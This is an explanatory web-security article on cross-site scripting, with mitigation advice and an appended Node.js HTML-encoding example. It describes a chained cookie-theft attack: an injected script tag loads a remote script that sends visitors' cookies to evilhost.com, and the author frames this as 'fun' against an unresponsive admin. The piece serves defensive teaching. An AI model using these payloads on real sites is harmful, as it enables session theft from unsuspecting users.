XSS Vulnerabilities: So Underestimated, So Dangerous

In this little paper I will try to convince admins, webmasters and in general everyone concerned with securing a web site of how dangerous an XSS hole can be. I will not cover in depth what XSS is, because there is a huge library on this topic available on the internet and on www.hackerscenter.com/library

--[ 2.0 XSS

So what's XSS? XSS stands for cross site scripting: it is a way to inject script code into a web page so that it executes whenever the page loads or a specific event is triggered.

2.1 Temporary XSS

One reason this kind of bug is underestimated is what I call "temporary XSS". A temporary XSS is script code that executes only when the user issues a crafted input containing the script code.

Example: http://vuln.host.com/search.asp?q=<plaintext>

The above example injects a "<plaintext>" tag into the search.asp page, showing the HTML source of the page. The point here is: whoever searched for <plaintext> will see the source code, but this does not imply any permanent alteration of the page.

2.2 Permanent XSS

A "permanent XSS", as I call them, is due to unsanitized user input that is saved, for example, in a database. Each time these unsanitized fields are read from the database and printed on the page, the script is executed. (A lot of registration forms' server-side scripts are affected by this kind of vuln.)

--[ 3.0 Attacks

What I want to demonstrate in this article is how dangerous a temporary XSS can be. Most webmasters (99%, believe me) treat this kind of bug as a very, very low-level issue because of the reasons we have seen. They think it is even a waste of time to sanitize input that doesn't go into a database.

What they seem unable to understand is that whenever a malicious user is able to run a client-side script from their domain name, a cookie-stealing attack can *easily* be carried out. This becomes a high-risk vuln when we deal with e-commerce sites, webmail services and the like.

3.1 Scenario 1

Let's assume that we've found an XSS vuln in 2 sites. The first will be used as the "dumb" site (A), which has a permanent XSS hole, while the latter will be a big shopping portal (B) I want to steal cookies from, which has "just" a little innocent temporary XSS hole.

We mail the big shopping portal admin about the vuln, trying to make him understand how serious the bug is. He never replies. So we decide to have some fun... innocent fun... as innocent as their XSS hole was, I suppose...

What one could do is inject a stealth script into the dumb site to force (always stealthily) every visitor of site A to load the vulnerable URL we have found on site B.

Here anyone can understand that even http://vuln.host.com/search.asp?q=<plaintext> is now very, very useful for our purpose. Instead of <plaintext>, we can use something like this:

http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script>

funny.js will be our malicious script code that will run on the vuln.host.com domain, and it will be similar to this:

// funny.js
// navigate to 'evilhost.com/collect_cookies.asp?cookie=' + document.cookie

where collect_cookies.asp will be a server-side script that collects everything passed in the "cookie" parameter, and evilhost.com can be a hosting space set up by the malicious attacker.

So what happens here?

1. A user visits the dumb site, thus triggering our permanent XSS.
2. The permanent XSS loads the page http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script>, which executes funny.js thanks to the temporary XSS hole in the big shopping portal.
3. funny.js is now loaded on the big shopping portal's domain name, letting us steal the cookie (and the login data) of the dumb site's visitor.

By "stealth script" we mean a script that doesn't change the appearance of the page, so that no one will notice any background work.

--[ Side effects

In this section I will show some side effects of the XSS disease that are often forgotten or misunderstood by a lot of analysts/webmasters.

XSS holes, permanent and temporary ones, can be used to attack a local victim (a visitor of the vulnerable site) directly, by injecting malicious code capable of exploiting a local vulnerability of the victim's system. This has become very common (and easy to do) because of the tons of vulnerabilities that affect Internet Explorer and browsers in general.

Let's take for example an XSS hole in trustedsite.com. Anyone could take advantage of the trust placed in this domain to execute code with high privilege levels, executing or installing malicious ActiveX controls. This kind of approach can be taken with Internet Explorer and, in general, with all the browsers that use the so-called trusted "Zones".

Another important issue that can turn a simple XSS hole into a high-risk issue is the capability of attacking thousands of computers in a few hours, or even minutes, depending on the traffic of the vulnerable page. This kind of practice can lead to malware/adware spread. If a high-traffic page is vulnerable to a permanent XSS, a malware/worm/adware coder can choose this kind of approach to plant the seeds of his worm, making it spread stealthily and in a short time.

--[ How to solve the problem

Incredible to say, XSS holes are the simplest to solve and fix. They usually involve the script tag, but not always. Less well-known code can use the image tag with the dynsrc or src attributes and "javascript:alert('aaa')" as the argument, or the <style> tag, e.g.: <style type="text/javascript">script goes here</style>

In general the characters to be sanitized are the usual "<" and ">", but there are some more to be carefully escaped: &{code}; will run the code in Netscape/Mozilla browsers, so the "&{" combination of characters should be sanitized too. In 99% of the cases an "HTML Encode" would solve the problem. In ASP it can easily be done with the built-in function server.htmlencode(myparameter).

About the Author

Zinho is webmaster and founder of http://www.hackerscenter.com, a leading security portal with texts and articles to help secure web sites and networks.
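Added example, not part of Zinho's article: a small Node.js module that puts the unencoded search-page reflection beside an HTML-encoded one and checks both against the article's own <plaintext> and <script src=...> payloads and the &{...} entity form. The page markup, the safeUrl helper and the sample URLs are assumptions; safeUrl covers the one case named above where HTML encoding alone is not enough, a javascript: URL landing in an image src attribute.

```javascript
// Added example (not Zinho's code): output encoding for a search.asp-style
// page that reflects the query, written for Node.js. The page markup, the
// safeUrl helper and the sample URLs are assumptions made for this example.

// Encode the five characters that let input break out of an HTML text or
// quoted-attribute context. Encoding "&" also defuses the Netscape-era
// "&{code};" JavaScript entity the article mentions.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the query is echoed back verbatim. This is the
// "temporary XSS" of the article: nothing is stored, the page is only
// altered for whoever loads this one URL.
function renderSearchPageUnsafe(q) {
  return `<html><body><p>Results for: ${q}</p></body></html>`;
}

// Hardened rendering: same page, query HTML-encoded at the point of output.
function renderSearchPageSafe(q) {
  return `<html><body><p>Results for: ${htmlEncode(q)}</p></body></html>`;
}

// HTML encoding alone does not cover user input placed in a URL attribute such
// as <img src="...">: "javascript:alert('aaa')" contains none of the five
// characters above. A URL context needs a scheme allow-list as well (assumed
// helper; returns an inert value for anything that is not http or https).
function safeUrl(candidate) {
  try {
    const url = new URL(candidate);
    if (url.protocol === "http:" || url.protocol === "https:") {
      return htmlEncode(url.href);
    }
  } catch (e) {
    // not an absolute URL at all
  }
  return "about:blank";
}

// True if the markup contains an element with this tag name, i.e. if the
// input survived as live HTML rather than as visible text.
function containsTag(html, tagName) {
  return new RegExp(`<${tagName}[\\s>]`, "i").test(html);
}

// Constructed sample input: the two payloads quoted in the article plus the
// Netscape entity form.
const PAYLOADS = [
  "<plaintext>",
  "<script src='http://myhosting.com/xsstrials/funny.js'></script>",
  "&{alert(1)};",
];

for (const q of PAYLOADS) {
  console.log("unsafe:", renderSearchPageUnsafe(q));
  console.log("safe:  ", renderSearchPageSafe(q));
}
console.log("img src from javascript: URL ->", safeUrl("javascript:alert('aaa')"));
```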